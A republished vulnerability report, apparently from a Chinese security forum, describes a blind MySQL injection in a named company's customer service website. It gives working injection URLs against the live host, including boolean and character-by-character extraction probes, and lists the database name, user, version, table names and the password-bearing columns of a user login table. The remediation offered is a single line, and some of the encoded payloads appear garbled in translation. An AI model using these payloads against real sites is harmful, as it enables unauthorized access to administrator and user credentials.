Blind mysql injection and repair exist on jiuyang Customer Service Center website

Source: Internet
Author: User
Tags mysql injection

The jiuyang Customer Service Center website has a mysql blind injection (administrator and all registered user information can be obtained ):
Http://kf.joyoung.com/wangDian.html?
Page. curPage = 1 & page. zongPageStr = 7 & page. zongNumsStr = 105 & page. fen = 15 & rzong = 105 & wdname = & wdsort = & wdcode = & wdsheng = & wdshi = & fuzeren = & wdurl = '% 20aNd % 20 'A' % 20 lIke % 20'a
 
Http://kf.joyoung.com/wangDian.html?
Page. curPage = 1 & page. zongPageStr = 7 & page. zongNumsStr = 105 & page. fen = 15 & rzong = 105 & wdname = & wdsort = & wdcode = & wdsheng = & wdshi = & fuzeren = & wdurl = '% 20and % 20 (select % 20 length (database ())) = 12% 20aNd % 20's '% 20 lIke % 20's
 
Http://kf.joyoung.com/wangDian.html?
Page. curPage = 1 & page. zongPageStr = 7 & page. zongNumsStr = 105 & page. fen = 15 & rzong = 105 & wdname = & wdsort = & wdcode = & wdsheng = & wdshi = & fuzeren = & wdurl = '% 20and % 20 (select % 20abs (ascii (substr (database (), 107%) = 20108% 20and % 20aNd % 20's '% 20 lIke % 20's
 
...
...
...
And so on!
Database file directory:/var/lib/mysql/
Current Database Name: kfjoyoungscf
Current User name: service127 @ localhost
Database Version: 5.5.11-log
 
Some tables in the current database:
T_adminuser
T_diaocha
T_grade
T_hint
T_joyperson
T_joyuserlogin
T_jubao
T_liucheng
T_minglie
T_myproduct
T_newsbankuai
...
Some column names in the t_joyuserlogin table:
Joyloginid
Joyloginname
Joypasswd
Joytype
Joypasswdt
Registertime
Lastlogintime
Todaylogintimes
Totaltimes
Email
...
 
 
Solution:
 
Perform necessary filtering!
 
Author: leaf

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.